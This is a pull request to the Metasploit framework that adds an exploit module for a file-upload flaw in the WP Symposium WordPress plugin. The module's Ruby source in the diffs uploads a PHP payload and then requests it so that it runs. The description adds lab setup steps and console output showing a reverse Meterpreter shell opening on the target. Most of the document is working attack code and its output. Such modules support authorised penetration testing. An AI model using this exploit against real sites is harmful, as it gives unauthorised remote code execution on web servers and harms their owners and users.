### PR TITLE
Add WP Symposium Shell Upload module

### DIFF
--- a/modules/exploits/unix/webapp/wp_symposium_shell_upload.rb
+++ b/modules/exploits/unix/webapp/wp_symposium_shell_upload.rb
@@ -8,6 +8,7 @@ require 'msf/core'
 class Metasploit3 < Msf::Exploit::Remote
   Rank = ExcellentRanking
 
+  include Msf::Exploit::FileDropper
   include Msf::HTTP::Wordpress
 
   def initialize(info = {})
@@ -76,6 +77,8 @@ class Metasploit3 < Msf::Exploit::Remote
 
     if res && res.code == 200 && res.body.length > 0 && !res.body.include?('error') && res.body != '0'
       print_good("#{peer} - Uploaded the payload")
+      register_files_for_cleanup(payload_name)
+
       print_status("#{peer} - Executing the payload...")
       send_request_cgi(
       {

--- a/modules/exploits/unix/webapp/wp_symposium_shell_upload.rb
+++ b/modules/exploits/unix/webapp/wp_symposium_shell_upload.rb
@@ -59,9 +59,9 @@ class Metasploit3 < Msf::Exploit::Remote
 
   def exploit
     print_status("#{peer} - Preparing payload")
-    unique_name = "#{Rex::Text.rand_text_alpha(10)}"
+    unique_name = Rex::Text.rand_text_alpha(10)
     payload_name = "#{unique_name}.php"
-    symposium_url = normalize_uri(target_uri, wp_content_dir, 'plugins', 'wp-symposium', 'server', 'php')
+    symposium_url = normalize_uri(wordpress_url_plugins, 'wp-symposium', 'server', 'php')
     payload_url = normalize_uri(symposium_url, unique_name, payload_name)
     data = generate_mime_message(payload, payload_name, unique_name, symposium_url)
     symposium_url = normalize_uri(symposium_url, 'index.php')
@@ -84,9 +84,13 @@ class Metasploit3 < Msf::Exploit::Remote
       }, 5)
       print_good("#{peer} - Executed payload")
     else
-      print_error("#{peer} - Failed to upload the payload")
-      vprint_error("#{peer} - HTTP Status: #{res.code}")
-      vprint_error("#{peer} - Server returned: #{res.body}")
+      if res.nil?
+        fail_with(Failure::Unreachable, "No response from the target")
+      else
+        vprint_error("#{peer} - HTTP Status: #{res.code}")
+        vprint_error("#{peer} - Server returned: #{res.body}")
+        fail_with(Failure::UnexpectedReply, "Failed to upload the payload")
+      end
     end
   end
 end

--- a/modules/exploits/unix/webapp/wp_symposium_shell_upload.rb
+++ b/modules/exploits/unix/webapp/wp_symposium_shell_upload.rb
@@ -1,0 +1,92 @@
+##
+# This module requires Metasploit: http//www.metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::HTTP::Wordpress
+
+  def initialize(info = {})
+    super(update_info(
+      info,
+      'Name'            => 'WordPress WP Symposium 14.11 Shell Upload',
+      'Description'     => %q{WP Symposium Plugin for WordPress contains a
+                              flaw that allows a remote attacker to execute
+                              arbitrary PHP code. This flaw exists because the
+                              /wp-symposium/server/file_upload_form.php script
+                              does not properly verify or sanitize
+                              user-uploaded files. By uploading a .php file,
+                              the remote system will place the file in a
+                              user-accessible path. Making a direct request to
+                              the uploaded file will allow the attacker to
+                              execute the script with the privileges of the
+                              web server.},
+      'License'         => MSF_LICENSE,
+      'Author'          =>
+        [
+          'Claudio Viviani',                # Vulnerability disclosure
+          'Rob Carr <rob[at]rastating.com>' # Metasploit module
+        ],
+      'References'      =>
+        [
+          ['OSVDB', '116046'],
+          ['WPVDB', '7716']
+        ],
+      'DisclosureDate'  => 'Dec 11 2014',
+      'Platform'        => 'php',
+      'Arch'            => ARCH_PHP,
+      'Targets'         => [['wp-symposium < 14.12', {}]],
+      'DefaultTarget'   => 0
+    ))
+  end
+
+  def check
+    check_plugin_version_from_readme('wp-symposium', '14.12')
+  end
+
+  def generate_mime_message(payload, payload_name, directory_name, symposium_url)
+    data = Rex::MIME::Message.new
+    data.add_part('1', nil, nil, 'form-data; name="uploader_uid"')
+    data.add_part("./#{directory_name}/", nil, nil, 'form-data; name="uploader_dir"')
+    data.add_part(symposium_url, nil, nil, 'form-data; name="uploader_url"')
+    data.add_part(payload.encoded, 'application/x-php', nil, "form-data; name=\"files[]\"; filename=\"#{payload_name}\"")
+    data
+  end
+
+  def exploit
+    print_status("#{peer} - Preparing payload")
+    unique_name = "#{Rex::Text.rand_text_alpha(10)}"
+    payload_name = "#{unique_name}.php"
+    symposium_url = normalize_uri(target_uri, wp_content_dir, 'plugins', 'wp-symposium', 'server', 'php')
+    payload_url = normalize_uri(symposium_url, unique_name, payload_name)
+    data = generate_mime_message(payload, payload_name, unique_name, symposium_url)
+    symposium_url = normalize_uri(symposium_url, 'index.php')
+
+    print_status("#{peer} - Uploading payload to #{payload_url}")
+    res = send_request_cgi(
+      'method'  => 'POST',
+      'uri'     => symposium_url,
+      'ctype'   => "multipart/form-data; boundary=#{data.bound}",
+      'data'    => data.to_s
+    )
+
+    if res && res.code == 200 && res.body.length > 0 && !res.body.include?('error') && res.body != '0'
+      print_good("#{peer} - Uploaded the payload")
+      print_status("#{peer} - Executing the payload...")
+      send_request_cgi(
+      {
+        'uri'     => payload_url,
+        'method'  => 'GET'
+      }, 5)
+      print_good("#{peer} - Executed payload")
+    else
+      print_error("#{peer} - Failed to upload the payload")
+      vprint_error("#{peer} - HTTP Status: #{res.code}")
+      vprint_error("#{peer} - Server returned: #{res.body}")
+    end
+  end
+end


### PR DESCRIPTION
This module provides the ability to upload and execute an arbitrary PHP file by utilising a lack of validation in WordPress websites using versions <= 14.11 of the WP Symposium plugin.
## References
- http://www.osvdb.org/116046
- https://wpvulndb.com/vulnerabilities/7716
## Verification
- [x] Download and install [WordPress](https://wordpress.org/download/)
- [x] Download v14.11 of the WP Symposium plugin from the plugin archive at https://downloads.wordpress.org/plugin/wp-symposium.14.11.zip
- [x] Extract the `wp-symposium` folder into the `/wp-content/plugins/` directory inside your WordPress installation folder
- [x] Ensure the wp-symposium directory has write access (`chmod 777 wp-symposium -R`)
- [x] Login to your WordPress website and navigate to the plugins section (`/wp-admin/plugins.php`) and click the "Activate" link for the WP Symposium plugin to activate it 
- [x] Load msfconsole and `use exploit/unix/webapp/wp_symposium_shell_upload`
- [x] Set RHOST to the target's address
- [x] If running WordPress in a subdirectory, ensure to set TARGETURI appropriately (e.g. if running in a folder called wordpress, set TARGETURI to /wordpress/)
- [x] Set the payload
- [x] Run `check` to check if the version seems vulnerable
- [x] Run `exploit` to upload and execute the payload
## Example Output

```
msf > use exploit/unix/webapp/wp_symposium_shell_upload
msf exploit(wp_symposium_shell_upload) > set RHOST 192.168.1.15
RHOST => 192.168.1.15
msf exploit(wp_symposium_shell_upload) > set TARGETURI /wordpress/
TARGETURI => /wordpress/
msf exploit(wp_symposium_shell_upload) > set PAYLOAD php/meterpreter/reverse_tcp
PAYLOAD => php/meterpreter/reverse_tcp
msf exploit(wp_symposium_shell_upload) > set LHOST 192.168.1.189
LHOST => 192.168.1.189
msf exploit(wp_symposium_shell_upload) > check
[*] 192.168.1.15:80 - The target appears to be vulnerable.
msf exploit(wp_symposium_shell_upload) > exploit

[*] Started reverse handler on 192.168.1.189:4444 
[*] 192.168.1.15:80 - Preparing payload
[*] 192.168.1.15:80 - Uploading payload to /wordpress/wp-content/plugins/wp-symposium/server/php/ARoFgSGCAx/ARoFgSGCAx.php
[+] 192.168.1.15:80 - Uploaded the payload
[*] 192.168.1.15:80 - Executing the payload...
[*] Sending stage (40551 bytes) to 192.168.1.15
[*] Meterpreter session 4 opened (192.168.1.189:4444 -> 192.168.1.15:48581) at 2015-01-08 21:09:09 +0000
[+] Deleted ARoFgSGCAx.php
[+] 192.168.1.15:80 - Executed payload

meterpreter > ls

Listing: /var/www/html/wordpress/wp-content/plugins/wp-symposium/server/php/ARoFgSGCAx
======================================================================================

Mode             Size  Type  Last modified              Name
----             ----  ----  -------------              ----
40755/rwxr-xr-x  4096  dir   2015-01-08 21:16:31 +0000  thumbnail

meterpreter > 
```
